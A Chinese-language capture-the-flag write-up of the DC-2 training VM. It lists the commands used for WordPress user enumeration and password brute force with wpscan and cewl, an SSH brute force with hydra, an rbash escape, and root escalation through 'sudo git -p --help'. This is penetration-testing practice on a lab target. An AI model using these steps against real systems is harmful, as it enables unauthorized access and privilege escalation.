渗透测试实战-DC-2-靶机入侵

312 阅读1分钟

​​​本文已参与「新人创作礼」活动,一起开启掘金创作之路。

DC-2 靶机实战

靶机资源:

链接:pan.baidu.com/s/1L-fHw8bN… 
提取码:8r7m

启动DC-2

配置其网络为NAT 查看其Mac 地址,重启DC-2 使其网路配置生效

使用nmap 扫描内网网段

得到DC-2 的IP地址192.168.1.162

对其进行信息收集

访问其IP ,连接失败

添加本地DNS解析

vim /etc/hosts

再访问该网站,成功

flag1

cewl 工具

cewl dc-2 >pwd.dic

网站目录扫描

使用MSF 进行网站目录扫描

use auxiliary/scanner/http/dir_scanner

set RHOSTS 192.168.1.162

set THREADS 50

exploit

wpscan工具

wpscan --update

apt-get install wpscan wpscan   更新

注:如果wpscan 无法使用,可以尝试更换新的kali 虚拟机,笔者就碰到类似的问题,安装 kali 2020.2 之后,wpscan 启动成功

附清华大学开源镜像站kali2020.2(amd64,installer)下载链接

mirrors.tuna.tsinghua.edu.cn/kali-images…

wpscan --url dc-2 -e u

wpscan 爆破用户

wpscan --url dc-2 -U user.dic -P pwd.dic

flag2

192.168.1.162/wp-admin

使用jerry用户并用我们爆破出来的密码尝试登录

找到flag2

他告诉我们需要另辟蹊径,我们想到了刚开始使用nmap 扫描时,还扫出了ssh 端口7744

hydra 爆破ssh

hydra -L user.dic -P pwd.dic ssh://192.168.1.162 -s 7744 -o hydra.ssh -vV

查看结果:

尝试使用ssh 登录

ssh tom@192.168.1.162 -p 7744

查看当前目录文件

ls

cat flag3.txt

发现有rbash 命令限制

flag3

绕过限制

BASH_CMDS[a]=/bin/sh;a

/bin/bash

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

flag4

切换用户

切换jerry用户

su jerry

输入密码,登录成功

我们进入到jerry 用户的家目录

执行命令,发现没有权限

final-flag

提权

查看具有root权限的命令

sudo -l

发现git 命令具有root 权限,但是不需要提供给root 密码

git 提权

sudo git -p --help

强制进入交互式状态,让页面缓冲区无法显示全部信息

!/bin/bash